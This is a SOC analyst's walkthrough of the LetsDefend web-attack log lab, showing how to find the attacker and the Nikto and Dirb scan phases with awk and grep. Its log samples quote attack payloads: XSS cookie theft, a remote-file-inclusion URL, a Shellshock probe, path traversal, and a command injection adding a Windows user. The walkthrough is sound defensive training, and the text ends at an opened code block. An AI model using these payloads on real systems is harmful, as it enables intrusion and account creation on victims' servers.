SOC Playbook: LetsDefend – Investigate Web Attack

If you are looking for a definitive LetsDefend Investigate Web Attack walkthrough, you are in the right place. As a SOC Analyst working through real-world scenarios, I recently completed the “Detecting Web Attacks” challenge on LetsDefend and built this guide to reflect how a modern SOC investigation should actually be performed.

This is not just about finding the correct answers to complete a lab, but about thinking and operating like a Security Operations Center professional handling a live incident. In a real SOC environment, web attack investigation requires structured triage, log analysis, threat identification, and clear decision-making under pressure. This walkthrough applies those same principles, showing how to analyze attacker behavior, identify patterns, and connect events across logs in a way that mirrors real incident response workflows.


What You Will Learn from This Walkthrough

Throughout this guide, you will see how common web attack techniques are investigated from a SOC perspective, including:

  • Automated Reconnaissance: Spotting bot-driven scans and directory discovery.
  • Brute Force Authentication: Identifying and mitigating credential stuffing or password spraying.
  • Command Injection: Detecting attempts to execute arbitrary commands on the host OS.

The focus is not just on recognizing indicators, but on understanding why they matter and building an analytical mindset that goes beyond tools and signatures toward deeper behavioral analysis.

Whether you are an aspiring SOC Analyst or already working in a SOC role, this guide is designed to strengthen your ability to perform effective web attack investigations using a structured, real-world methodology.


Investigation Scope

In the following sections, I will begin investigating the web server log file access.log from the LetsDefend Investigate Web Attack challenge.

Questions Answered:

  • Q1: Which automated scan tool did the attacker use for web reconnaissance?
  • Q2: After web reconnaissance activity, which technique did the attacker use for directory listing discovery?
  • Q3: What is the third attack type after directory listing discovery?
  • Q4: Is the third attack successful?
  • Q5: What is the name of the fourth attack?
  • Q6: What is the first payload for the fourth attack?
  • Q7: Is there any persistency clue for the victim machine in the log file? If yes, what is the related payload?

Before You Begin — Understanding the Log Format

Every line in an Apache/Nginx combined access log follows this fixed structure:

IP - - [TIMESTAMP] "METHOD ENDPOINT PROTOCOL" STATUS RESPONSE_SIZE "REFERER" "USER-AGENT"

Example:

192.168.199.2 - - [20/Jun/2021:12:36:24 +0300] "GET /bwapp/ HTTP/1.1" 200 4086 "-" "Mozilla/5.00 (Nikto/2.1.6)"

View 1: The Default Space-Delimited Structure

awk Position  Field          Example value          What it tells you
------------  -------------  ---------------------  -----------------
$1            IP address     192.168.199.2          Source of the request: who made it
$2            Ident          -                      RFC 1413 client identity; almost always -, not used
$3            Auth user      -                      Authenticated username; - if no HTTP authentication
$4            Date/time      [20/Jun/2021:12:36:24  Timestamp with opening bracket: first half of the request time
$5            Timezone       +0300]                 UTC offset: second half of the timestamp, closes the bracket
$6            Method         "GET                   HTTP method: GET=reading, POST=submitting data (includes opening ")
$7            Endpoint       /bwapp/                Requested URL path; may contain URL-encoded attack payloads
$8            Protocol       HTTP/1.1"              HTTP version: confirms protocol in use (includes closing ")
$9            Status code    200                    Server response: 200=ok, 302=redirect, 403=forbidden, 404=not found
$10           Response size  4086                   Response size in bytes; - means no body; uniform value = same page served every time
$11           Referer        "-"                    URL of the referring page in quotes; - if request was direct
$12+          User-Agent     "Mozilla/5.00          Tool or browser making the request; field count varies when the UA string contains spaces; use awk -F'"' '{print $6}' for reliable extraction regardless of UA length

View 2: The Secure Quote-Delimited Structure (The Enterprise Standard)

To reliably extract fragile data like the User-Agent or the URL, SOC analysts use awk -F'"' to slice the log on double-quotes instead of spaces. This shifts the column numbers completely and creates “buckets” that do not break when a value contains spaces.

awk -F'"' Position  Field                           Example value                                   What it securely isolates
------------------  ------------------------------  ----------------------------------------------  -------------------------
$1                  Pre-Request Block (IP & Time)   192.168.199.2 - - [20/Jun/2021:12:36:24 +0300]  The IP, Timestamp, and formatting spaces before the first quote.
$2                  HTTP Request Block              GET /bwapp/ HTTP/1.1                            The Full HTTP Request: Safely isolates the URL, even if the attacker injected spaces into the path.
$3                  Response Block (Status & Size)  200 4086                                        The Status Code and Body Size.
$4                  Referer                         -                                               The Referer: Safely trapped inside the second set of quotes.
$5                  Formatting Space                (single space)                                  The single blank space between the Referer and the User-Agent.
$6                  User-Agent                      Mozilla/5.00 (Nikto/2.1.6)                      The Full User-Agent: Safely captures the entire tool signature, regardless of how many spaces it contains.

Crucial Parsing Concepts: awk vs awk -F'"'

  • The Default awk Flaw: By default, awk cuts log lines at every space. If an attacker injects spaces into a URL, or if a User-Agent contains spaces (e.g., Mozilla/5.0 (Macintosh...), standard awk shatters the data across the wrong columns.
  • The awk -F'"' Solution: Adding -F'"' forces awk to cut the line only at double-quotes ("). This safely traps volatile data (like the HTTP Request in $2 and the User-Agent in $6) into unbreakable buckets, regardless of how many spaces are inside them.
  • The $5 Formatting Space: Why is $5 just a blank space? Apache logs put a physical space between fields for readability (e.g., "-" "Mozilla..."). When awk cuts at the Referer’s closing quote and the User-Agent’s opening quote, that single formatting space gets trapped all by itself in bucket $5.
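To make the difference concrete, the short sketch below runs both splitting modes on the sample line from the example above. The variable names (sample, ua_space, ua_quote) are illustrative only.

```shell
# Sample line copied from the log-format example; names are illustrative.
sample='192.168.199.2 - - [20/Jun/2021:12:36:24 +0300] "GET /bwapp/ HTTP/1.1" 200 4086 "-" "Mozilla/5.00 (Nikto/2.1.6)"'

# Default whitespace splitting: $12 holds only the first word of the
# User-Agent, still carrying its opening quote.
ua_space=$(printf '%s\n' "$sample" | awk '{print $12}')

# Quote splitting: $6 holds the complete User-Agent, spaces included.
ua_quote=$(printf '%s\n' "$sample" | awk -F'"' '{print $6}')

printf 'space-split field 12: %s\n' "$ua_space"
printf 'quote-split field 6:  %s\n' "$ua_quote"
```

The first value comes back as "Mozilla/5.00 with the tool name cut off, while the second returns the full Mozilla/5.00 (Nikto/2.1.6) signature.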

⚠️ The Limitation of Quote-Parsing
While -F'"' solves the space injection problem, attackers can still break it by injecting raw double-quotes (") directly into URLs. These injected quotes physically shatter the quote-delimited structure, causing awk to misread the fields. This is why Step 2B uses a structural regex method to detect and isolate these malformed payloads before you begin standard analysis.
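The limitation can be reproduced on a single line. The sketch below uses a hypothetical log line (the path, timestamp and payload are made up for illustration) with an escaped double-quote inside the URL, and shows how the quote-delimited fields shift.

```shell
# Hypothetical malformed line: an escaped double-quote (\") sits inside the URL.
bad='192.168.199.2 - - [20/Jun/2021:12:36:30 +0300] "GET /bwapp/x.php?id=\"<script>alert(1)</script> HTTP/1.1" 404 300 "-" "Mozilla/5.00 (Nikto/2.1.6)"'

# A well-formed line has 6 quotes and splits into 7 fields; this one has 7 quotes.
nf=$(printf '%s\n' "$bad" | awk -F'"' '{print NF}')

# $6 now holds the single formatting space; the User-Agent has moved to $7.
f6=$(printf '%s\n' "$bad" | awk -F'"' '{print $6}')
f7=$(printf '%s\n' "$bad" | awk -F'"' '{print $7}')

printf 'NF=%s  field6=[%s]  field7=[%s]\n' "$nf" "$f6" "$f7"
```

Every field after the injected quote shifts by one position, so a query that trusts $6 silently reads the wrong value on such lines.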


PHASE 1 — SITUATIONAL AWARENESS

Know what you have before touching anything


STEP 1 — Establish the log size and incident time window

Why: Before any analysis, you need to understand the scope. Total line count, read against the time window, indicates how automated the activity was. The timestamp window gives the total duration covered by the log, which bounds the malicious activity. Establishing both first prevents drawing conclusions from incomplete data.

# Total number of entries in the log
wc -l access.log

# First and last full log lines — shows format and time boundary
head -1 access.log
tail -1 access.log

# Extract timestamps cleanly to see the window
head -1 access.log | awk '{print $4, $5}'
tail -1 access.log | awk '{print $4, $5}'

What to look for:

  • High line counts (5,000+) in a short time window indicate automated tooling
  • Compare first vs last timestamp to determine incident duration
  • The last log line is particularly important — it often contains the final attacker action

This log — confirmed results:

12556 access.log
First entry:  [20/Jun/2021:12:35:40 +0300]  (legitimate user browsing)
Last entry:   [20/Jun/2021:12:53:23 +0300]  (attacker's final injected command)
Total window: 17 minutes 43 seconds

Record: Total lines: _____ | First timestamp: _____ | Last timestamp: _____
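The duration can also be computed rather than worked out by hand. The sketch below is one possible helper, not part of the original lab; the function names window_seconds and format_duration are hypothetical, and it assumes the first and last entries fall on the same calendar day.

```shell
# window_seconds FILE: seconds between the first and the last log entry.
# Assumption: both entries share one calendar day, so only the HH:MM:SS
# part of field $4 (e.g. [20/Jun/2021:12:35:40) is compared.
window_seconds() {
    awk '
        { split($4, t, ":"); secs = t[2] * 3600 + t[3] * 60 + t[4] }
        NR == 1 { first = secs }
        END     { print secs - first }
    ' "$1"
}

# format_duration SECONDS: render a second count as "M min S sec".
format_duration() {
    awk -v s="$1" 'BEGIN { printf "%d min %d sec\n", int(s / 60), s % 60 }'
}

# Usage against the real file:
#   format_duration "$(window_seconds access.log)"
```

For the boundaries recorded above (12:35:40 and 12:53:23) the difference is 1,063 seconds, which formats as 17 min 43 sec.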


STEP 2A — Confirm the log format and field positions

Why: Field positions in awk commands are zero-tolerance. If the log has extra fields or a non-standard format, every subsequent command extracting $6, $7, $9 will produce wrong output. You must verify format before proceeding.

# Visually inspect the first 3 lines
head -3 access.log

# Count fields in a representative line
head -1 access.log | awk '{print NF}'

Expected for Apache Combined Log Format:

  • Field count is typically 12 or more; it varies because User-Agent strings (and occasionally URLs) contain spaces
  • Field 4 starts with [ (timestamp)
  • Field 6 is the HTTP method, prefixed by the opening quote
  • Field 9 is the 3-digit HTTP status code on every well-formed line

This log — confirmed results:

NF = 21
Format: Apache Combined Log Format — confirmed
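Checking one line confirms the format, but the same expectations can be tested across the whole file. The sketch below is a hedged example; count_position_failures is a hypothetical helper name.

```shell
# count_position_failures FILE: number of lines where the space-split
# positions do not look as expected ($4 starts with "[" and $9 is exactly
# three digits). Assumes Apache Combined Log Format.
count_position_failures() {
    awk '
        $4 !~ /^\[/ || $9 !~ /^[0-9][0-9][0-9]$/ { bad++ }
        END { print bad + 0 }
    ' "$1"
}

# Usage against the real file:
#   count_position_failures access.log
```

A result of 0 means the positional fields line up everywhere. Any other value is the number of lines where $9 cannot be trusted as the status code, for example because a space inside the URL shifted the fields.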

STEP 2B — Validate log integrity and isolate malformed payloads

Why: Confirming the format in Step 2A is necessary but not sufficient. Relying on space-counted field positions assumes every line in the log is well-formed — but advanced attackers intentionally inject raw, unencoded double-quotes (") directly into URLs. These injected quotes physically shatter the column structure of the log line, causing standard awk positional commands to silently extract garbage data from the wrong fields. Before trusting any field extraction across the entire log, you must measure the structural health of the file and immediately surface the lines that break the parser. Those broken lines are not noise — they are almost always the most aggressive payloads in the dataset.

Part A — Format compliance check

Establish the exact number of lines that conform to the Apache Combined Log Format structure. This becomes your baseline. Any discrepancy between the total line count and the structural match count is your anomaly count.

# Total baseline line count
wc -l access.log

# Count lines that PERFECTLY match the Apache Combined Log Format structure
grep -Ec '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.log

Understanding the structural regex:

This pattern maps the exact physical blueprint of a combined log line. Instead of counting spaces, it anchors to the delimiters (brackets and double-quotes) that the web server itself writes around each field.

Regex pattern  Field              How it works
-------------  -----------------  ------------
^[^ ]+         IP address         Anchors to line start, reads until the first space
[^ ]+ [^ ]+    Ident & auth user  Steps over the two - placeholder fields
\[[^]]+\]      Timestamp          Captures everything enclosed in literal [ and ]
"[^"]*"        HTTP request line  Captures everything inside the first quote pair; an injected space inside the URL cannot break this because the anchor is the closing ", not a space
[0-9]{3}       Status code        Requires exactly three consecutive digits
[0-9-]+        Body size          Matches a digit string or a literal - for empty responses
"[^"]*"        Referer            Steps over the second quoted field
"[^"]*"        User-Agent         Steps over the final quoted field

How to interpret the comparison:

Scenario                   Meaning
-------------------------  -------
Both counts identical      Log is structurally clean; all positional awk commands are safe
grep count slightly lower  Anomaly detected; the gap is the number of malformed lines that failed the structural check
grep returns 0             Non-standard format (WAF log, JSON, custom format); positional awk will fail entirely, dynamic anchoring required

This log — confirmed results:

Total Lines:    12556
Matched Lines:  12457
Discrepancy:    99 malformed lines detected
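The comparison can be wrapped in one helper so the three numbers always come from the same tool. This is a sketch under stated assumptions: compliance_summary and CLF_RE are hypothetical names, and the total is taken with grep -c '' rather than wc -l so that a final line without a trailing newline is still counted.

```shell
# Structural pattern for one combined-format line (same regex as above).
CLF_RE='^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"'

# compliance_summary FILE: print total, matched and malformed line counts.
# grep -c '' counts every line, including an unterminated last line, which
# wc -l (a newline counter) would miss. grep exits non-zero when the count
# is 0, hence the "|| true".
compliance_summary() {
    total=$(grep -c '' "$1" || true)
    matched=$(grep -Ec "$CLF_RE" "$1" || true)
    printf 'Total: %s  Matched: %s  Malformed: %s\n' \
        "$total" "$matched" "$((total - matched))"
}

# Usage against the real file:
#   compliance_summary access.log
```

Because both counts come from grep, the malformed figure printed here always equals what the inverted grep -Ev would return for the same file.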

Part B — Isolate the malformed requests

Once a discrepancy is confirmed, immediately extract the lines that failed the structural check. These lines are invisible to standard positional awk parsers and represent the attacker’s most aggressive payload types.

# Extract every line that breaks the Apache Combined Log Format structure
grep -Ev '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.log

# Count the malformed lines and compare against the discrepancy from Part A
grep -Ev '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.log | wc -l

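Note on the count: The inverted grep returns 100 lines, while the arithmetic discrepancy (12556 − 12457) is 99. Because both greps use the same pattern, every line must land in exactly one of the two counts, so grep is seeing 12,557 lines (12,457 + 100). The most likely explanation is that the final line of access.log has no trailing newline: wc -l counts newline characters and therefore reports one line fewer than grep, which still counts the unterminated last line. The per-IP totals in Step 3 (12,528 + 29 = 12,557) are consistent with this. Treat 100 as the malformed-line count.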

Observed Evidence (sample of malformed lines):

192.168.199.2 ... "GET /bwapp/emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script> HTTP/1.1" 404 300 ...
192.168.199.2 ... "GET /bwapp/forum.asp?n=/.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver]... HTTP/1.1" 400 326 ...
192.168.199.2 ... "GET /bwapp/index.php?config[\"sipssys\"]=http://cirt.net/rfiinc.txt? HTTP/1.1" 302 - ...
(97 additional malformed lines)

What this means for the rest of the investigation:

These 100 lines are still in access.log and are not lost; they simply cannot be trusted to parse correctly with field-position commands. Their injected quotes shift the quote-delimited fields (-F'"') as well, which is why later steps fall back to grep against the raw log wherever these lines matter and isolate them explicitly in Step 7. The positional awk commands ($7, $9, $10) are valid for the 12,457 well-formed lines.


PHASE 2 — IDENTIFY THE ATTACKER

Separate malicious traffic from legitimate traffic


STEP 3 — Extract all unique source IPs with request counts

Why: Volume anomaly is the primary indicator of automated attack traffic. Legitimate browser sessions generate 10–50 requests as they load page assets. Scanners and brute force tools generate hundreds to thousands per minute. This single command separates the attacker from background noise.

# All source IPs with total request count, highest first
awk '{print $1}' access.log | sort | uniq -c | sort -rn

Decision thresholds:

Request Count   Assessment
--------------  ----------
< 100           Normal browser session
100 – 1,000     Suspicious; possible light scanning
1,000 – 10,000  Automated tooling; very likely attacker
> 10,000        Confirmed high-volume automation

This log — confirmed results:

12528   192.168.199.2    <-- ATTACKER (99.77% of all 12,556 entries)
   29   192.168.199.1    <-- Legitimate user (browser loading page assets)

Record your attacker IP: 192.168.199.2
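The decision thresholds from this step can be applied automatically. The sketch below is one way to do it; classify_ips is a hypothetical helper, and how the exact boundary values (1,000 and 10,000) are treated is an assumption, since the threshold table leaves that open.

```shell
# classify_ips FILE: request count per source IP with the assessment from
# the threshold table. Boundary handling (a count of exactly 1,000 or
# 10,000) is an assumption made for this sketch.
classify_ips() {
    awk '
        { hits[$1]++ }
        END {
            for (ip in hits) {
                n = hits[ip]
                if      (n < 100)    label = "normal browser session"
                else if (n <= 1000)  label = "suspicious"
                else if (n <= 10000) label = "automated tooling"
                else                 label = "high-volume automation"
                printf "%d %s %s\n", n, ip, label
            }
        }
    ' "$1" | sort -rn
}

# Usage against the real file:
#   classify_ips access.log
```

With the counts confirmed above, 192.168.199.2 (12,528 requests) falls in the top band and 192.168.199.1 (29 requests) in the lowest.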


STEP 4 — Visually confirm attacker identity by sampling their traffic

Why: High volume is necessary but not sufficient to confirm malicious intent. You must visually inspect a sample to confirm the traffic is anomalous before labeling this IP as the attacker and building all further analysis around that assumption.

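# First 20 requests: reveals initial tool and behavior
# (the pattern is anchored to the start of the line with escaped dots, so it
# matches only the source-IP field and not, say, 192.168.199.20)
grep '^192\.168\.199\.2 ' access.log | head -20

# Last 20 requests: reveals final actions and potential persistence
grep '^192\.168\.199\.2 ' access.log | tail -20

# Total count confirmation
grep '^192\.168\.199\.2 ' access.log | wc -l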

Signs of malicious automated traffic in the sample:

  • Tool names visible in the User-Agent field (Nikto, Dirb, sqlmap, etc.)
  • Requests to non-existent paths (404 responses) in rapid sequence
  • Random-looking filenames: 4RaXX5Ac.exe, 4RaXX5Ac.conf — these are Nikto’s file extension probe strings
  • Multiple requests at the exact same second — impossible by human typing

This log — confirmed results:

First 20: All Nikto/2.1.6 with test IDs like (Test:Port Check), (Test:map_codes)
          Probing random extensions: .exe, .show, .java, .x-shop, .bat|dir
          Predominantly 404 responses
Last 20:  Brute force login attempts followed by OS command injections
          Final line contains: system('net user hacker Asd123!! /add')
Total:    12528 — confirmed matches

STEP 5 — Isolate all attacker traffic into a dedicated working file

Why: Filtering all subsequent analysis to attacker-only traffic eliminates noise from legitimate users and makes every command faster and cleaner. This is a mandatory step — do not skip it. All remaining steps in this playbook operate on attacker_traffic.log.

# Create the attacker-specific working file (anchored pattern: source-IP field only)
grep '^192\.168\.199\.2 ' access.log > attacker_traffic.log

# Verify line count matches Step 3 and Step 4 counts exactly
wc -l attacker_traffic.log

# Confirm the attacker's own time window
head -1 attacker_traffic.log | awk '{print $4}'
tail -1 attacker_traffic.log | awk '{print $4}'

Validation check: The line count from wc -l attacker_traffic.log must equal the attacker's total from Step 3 and Step 4 (12,528 for this log). If they differ, the file creation failed; run the grep command again.

This log — confirmed results:

12528 attacker_traffic.log    (matches — file created correctly)
Attacker window: 12:36:24 → 12:53:23
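The create-then-verify routine can be folded into a single helper. The sketch below is an illustration rather than the lab's method; isolate_ip is a hypothetical name, and it matches the first field exactly with awk instead of searching for the address anywhere in the line.

```shell
# isolate_ip IP SRC DST: copy every line whose first field is exactly IP
# from SRC into DST, then verify the copy against an independent count.
isolate_ip() {
    awk -v ip="$1" '$1 == ip' "$2" > "$3"
    expected=$(awk -v ip="$1" '$1 == ip { n++ } END { print n + 0 }' "$2")
    actual=$(awk 'END { print NR }' "$3")
    if [ "$expected" -eq "$actual" ]; then
        echo "OK: $actual lines written to $3"
    else
        echo "MISMATCH: expected $expected, got $actual" >&2
        return 1
    fi
}

# Usage against the real file:
#   isolate_ip 192.168.199.2 access.log attacker_traffic.log
```

Exact matching on $1 means a neighbouring address such as 192.168.199.20, or the attacker's IP appearing inside a Referer, would not leak into the working file.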

PHASE 3 — FINGERPRINT THE ATTACK TOOLS

Every tool leaves a User-Agent signature — this phase answers Q1 and Q2


STEP 6 — Extract ALL unique User-Agent strings from attacker traffic

Why: This is the single most critical command in the entire playbook. Most automated attack tools send a distinctive default User-Agent with every request, so the set of meaningfully distinct User-Agents gives a first approximation of the attack phases. It is only an approximation: separate phases can share one User-Agent, as the manual phases later in this log do. One command hands you a draft attack phase map before you analyze anything else.

Why -F'"' and field $6: The log stores request fields inside double quotes. When awk splits on " as the field delimiter, the resulting fields are: $1=first part, $2=HTTP request line, $3=status/response block, $4=referer value, $5=space, $6=User-Agent value. This $6 position is fixed regardless of URL length or the number of spaces in the URL.

Important — User-Agent strings can be spoofed: User-Agent values are set by the client and can be freely modified by any tool or attacker. They provide a strong initial signal for tool identification, but must never be used as the sole basis for definitive attribution. Always validate User-Agent-based identification through behavioral evidence: request patterns, response codes, endpoint distribution, and request timing. The UA narrows your hypothesis — behavior confirms it.
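One simple way to start that behavioral validation is to pair each User-Agent with the status codes it received. The sketch below is a hedged example; ua_status_matrix is a hypothetical helper, and it deliberately skips lines that do not split into exactly 7 quote-delimited fields.

```shell
# ua_status_matrix FILE: for each User-Agent, count requests per status code.
# Both values come from quote-delimited fields: $6 is the User-Agent and the
# first word of $3 is the status code. Lines with NF != 7 are skipped because
# their fields are shifted.
ua_status_matrix() {
    awk -F'"' '
        NF == 7 { split($3, resp, " "); count[$6 "\t" resp[1]]++ }
        END { for (k in count) printf "%d\t%s\n", count[k], k }
    ' "$1" | sort -t "$(printf '\t')" -k2,2 -k1,1nr
}

# Usage against the real file:
#   ua_status_matrix access.log
```

Output is tab-separated (count, User-Agent, status). A User-Agent whose requests are overwhelmingly 404 behaves like a scanner whatever name it claims, while a browser-like mix of 200 and 302 responses supports a manual session.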

# Produces the complete global UA landscape including legitimate traffic
awk -F'"' '{print $6}' access.log | sort | uniq -c | sort -nr
# IP + UA correlation with tool variants collapsed — run against the raw log
awk -F'"' '{split($1, a, " "); print a[1], $6}' access.log | sed 's/ (Evasions.*//' | sort | uniq -c | sort -nr

Why both queries are needed: The first gives the full unfiltered inventory — every UA variant visible, no information discarded. The second solves the two limitations of the first: it binds each UA to its source IP, and it collapses Nikto’s per-test variants into a single line with a combined count. Together they answer two distinct questions — what tools exist in the log, and which IP used which tool.

This log — confirmed results from the IP + UA correlation query:

7303   192.168.199.2   Mozilla/5.00 (Nikto/2.1.6)                                       → Nikto (Phase 1)
4816   192.168.199.2   Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)               → Dirb  (Phase 2)
 174   192.168.199.2   Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/... Firefox/52.0  → Attacker browser (Phase 3+)
 101   192.168.199.2   -                                                                 → Nikto null-UA evasion
  61   192.168.199.2   () { :; }; echo Nikto-Added-CVE-2014-6271: true;...              → Nikto shellshock probe
  56   192.168.199.2   (empty)                                                           → Nikto empty-UA evasion
  29   192.168.199.1   Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0)...        → Legitimate user
  13   192.168.199.2   ./.\\\                                                            → Nikto path traversal test
   3   192.168.199.2   )</script> HTTP/1.1                                               → Nikto XSS test
   1   192.168.199.2   (log parsing artifact)

What this output tells you before any further analysis:

  • 192.168.199.1 appears on a single row (29 requests) with a legitimate macOS browser UA: confirmed as the benign user
  • 192.168.199.2 accounts for every other line — confirmed as the attacker
  • The attacker used three meaningfully distinct tools: Nikto, Dirb, and their own browser
  • The three tool phases are already visible, counted, and attributed to a single IP in one pass

# IP + UA correlation restricted to attacker traffic, Nikto variants collapsed
awk -F'"' '{split($1, a, " "); print a[1], $6}' attacker_traffic.log | sed 's/ (Evasions.*//' | sort | uniq -c | sort -nr
# Focused UA extraction: attacker traffic only, full per-variant detail
awk -F'"' '{print $6}' attacker_traffic.log | sort | uniq -c | sort -rn

Known tool signatures and what they mean:

User-Agent Pattern                   Tool                    Phase     Attack Type
-----------------------------------  ----------------------  --------  -----------
Nikto/2.x.x                          Nikto                   Phase 1   Web vulnerability scanner (Q1 answer)
MSIE 6.0; Windows NT 5.1             Dirb                    Phase 2   Directory brute force; Dirb’s known default UA
Mozilla/5.0 (X11; Linux...)          Attacker’s own browser  Phase 3+  Manual exploitation
sqlmap/x.x                           sqlmap                  Any       SQL injection
python-requests/x.x                  Custom script           Any       Custom automation
() { :; }; echo Nikto-Added-CVE-...  Nikto shellshock probe  Phase 1   CVE-2014-6271 exploitation attempt

This log — attacker-only UA breakdown (top entries from attacker_traffic.log):

4816   Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)             → Dirb
 234   Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:sitefiles)    → Nikto (one variant of many)
 221   Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:map_codes)    → Nikto
 174   Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/...Firefox/52.0 → Attacker browser
 101   -    (null UA — Nikto requests sent without UA header)
  61   () { :; }; echo Nikto-Added-CVE-2014-6271: true;...            → Nikto shellshock
  56   (empty string — more Nikto evasion variants)
  26   Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:004729)       → Nikto (individual test)
  13   ./.\\\   (Nikto path traversal evasion test)
  (... many more Nikto per-test lines follow)

Three distinct phases identified:

  • Phase 1: Multiple Nikto User-Agent variants (7,303 total when collapsed)
  • Phase 2: MSIE 6.0 / Windows NT 5.1 — Dirb’s known default (4,816 requests)
  • Phase 3+: Firefox/52.0 on Linux — attacker’s own browser, manual exploitation (174 requests)

STEP 7 — Verify and confirm Nikto as the reconnaissance tool — Q1

Why: Nikto explicitly embeds its name in the User-Agent. However, verification through behavior is required to be confident. Confirming that Nikto’s requests follow the expected pattern — probing for CVEs, testing file extensions, checking known dangerous paths — validates the identification beyond just UA matching.

# Total Nikto request volume
grep "Nikto" attacker_traffic.log | wc -l

# Sample of paths Nikto tested
grep "Nikto" attacker_traffic.log | awk '{print $7}' | head -20

# Response code distribution — shows what Nikto found vs what was missing
grep "Nikto" attacker_traffic.log | awk '{print $9}' | sort | uniq -c | sort -rn

# Nikto phase start and end timestamps
grep "Nikto" attacker_traffic.log | head -1 | awk '{print $4}'
grep "Nikto" attacker_traffic.log | tail -1 | awk '{print $4}'

Behavioral signatures that confirm Nikto:

  • Test ID annotations in UA: (Test:Port Check), (Test:map_codes), (Test:sitefiles), (Test:002857) — these are Nikto’s internal test catalog references
  • Random 8-character strings with multiple extensions: 4RaXX5Ac.exe, 4RaXX5Ac.conf — Nikto’s extension enumeration probes
  • Shellshock probe in UA field: () { :; }; echo Nikto-Added-CVE-2014-6271 — Nikto’s Bash shellshock test
  • Requests to known vuln paths: /_vti_pvt/, /phpinfo.php, /cgi-bin/, /.htaccess
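The test-ID signature in particular is easy to tally. The sketch below shows one possible approach; nikto_test_ids is a hypothetical helper that counts the first (Test:...) annotation found on each line.

```shell
# nikto_test_ids FILE: tally the (Test:...) annotations Nikto places in its
# User-Agent, most frequent first. Output is "count<TAB>annotation".
nikto_test_ids() {
    awk '
        match($0, /\(Test:[^)]*\)/) { ids[substr($0, RSTART, RLENGTH)]++ }
        END { for (id in ids) printf "%d\t%s\n", ids[id], id }
    ' "$1" | sort -rn
}

# Usage against the working file:
#   nikto_test_ids attacker_traffic.log | head
```

A long list of distinct test IDs, each with its own request count, is the catalog-driven behavior expected from a scanner and is hard to explain as ordinary browsing.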

This log — confirmed results:

7455 total Nikto requests
Start: [20/Jun/2021:12:36:24
End:   [20/Jun/2021:12:36:57    (33 seconds duration)

Why this count (7,455) differs from the 7,303 shown in Step 6:

Step 6’s IP + UA correlation query uses awk -F'"' to extract the User-Agent and sed to group them by the standard Mozilla/5.00 (Nikto/2.1.6) signature. The resulting 7,303 figure is an accurate count of that specific signature, but it undercounts the total Nikto traffic by approximately 152 requests.

This gap consists of two distinct Nikto evasion categories:

  1. Structurally Malformed Lines: As identified in Step 2B, the attacker injected raw double-quotes into the URLs (e.g., \"<script>), shattering the log’s column structure. On these lines, the text Nikto lands outside of the $6 User-Agent bucket, rendering them invisible to the positional awk query.
  2. Shellshock Probes (61 lines): These lines were structurally intact and captured perfectly by awk, but Nikto replaces its standard User-Agent header with the exploit payload () { :; }; echo Nikto-Added-CVE-2014-6271: true;.... Because they lack the standard Mozilla prefix, the sed collapse command isolates them into their own bucket of 61 rather than aggregating them into the main 7,303 count.

Command-Line Proof — Isolating the Malformed Lines (The Fast Way):
A healthy Apache Combined Log line contains exactly 6 double-quotes, meaning awk -F'"' will always split it into exactly 7 fields. Any line where the Number of Fields (NF) does not equal 7 has been structurally broken by injected quotes. You can verify the Nikto evasion payloads cleanly with this logic:

# 1. How many malformed lines contain the Nikto signature?
awk -F'"' 'NF!=7' access.log | grep -i "Nikto" | wc -l
# Output: 90

# 2. Show the rest of the malformed lines (Injection tests lacking the Nikto string)
awk -F'"' 'NF!=7' access.log | grep -vi "Nikto"

# 3. Show all 100 malformed lines together
awk -F'"' 'NF!=7' access.log

Q1 ANSWER: nikto


STEP 8 — Verify Dirb as the directory discovery tool — Q2

Why: The MSIE 6.0 / Windows NT 5.1 string is Dirb’s known default User-Agent. Genuine Internet Explorer 6 traffic is essentially extinct on modern networks, so its presence in the log is a strong initial indicator for Dirb or a similar directory brute-force tool configured with the same string. Because User-Agent strings are modifiable, tool identity must be confirmed through behavior, not the UA string alone. The combination of high request volume against wordlist-style paths with predominantly 404 responses is the definitive behavioral confirmation.

# Total MSIE 6.0 request volume
grep "MSIE 6.0" attacker_traffic.log | wc -l

# Sample of paths targeted — should show wordlist patterns
grep "MSIE 6.0" attacker_traffic.log | awk '{print $7}' | head -30

# Response code distribution — 404-dominant confirms wordlist scanning
grep "MSIE 6.0" attacker_traffic.log | awk '{print $9}' | sort | uniq -c | sort -rn

# Phase timestamps
grep "MSIE 6.0" attacker_traffic.log | head -1 | awk '{print $4}'
grep "MSIE 6.0" attacker_traffic.log | tail -1 | awk '{print $4}'

# Verify the 12-second duration by counting requests per second
grep "MSIE 6.0" attacker_traffic.log | awk '{print $4}' | sort | uniq -c

# View the chronological flow of Dirb requests (Time, Method, Path, Status)
# (Pipe to 'head -30' or 'less' to view the stream comfortably)
grep "MSIE 6.0" attacker_traffic.log | awk '{print $4, $6, $7, $9}' | head -30

Three-condition behavioral confirmation for directory brute-force:

Condition        Expected                               Interpretation if true
---------------  -------------------------------------  ----------------------
1. High volume   1,000+ requests                        Automated wordlist tool
2. Path variety  Common directory names, numeric paths  Wordlist enumeration
3. 404-dominant  80%+ returning 404                     Probing for things that don’t exist

All three must be true to confirm directory brute-force activity. User-Agent alone is insufficient — behavior seals the determination.
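The three conditions can be measured in a single pass. The sketch below is a hedged example: dirbust_check is a hypothetical helper, the 1,000-request and 80% thresholds are taken from the table above, and path variety is only reported as a distinct-path count because judging whether the paths look like a wordlist still needs an analyst.

```shell
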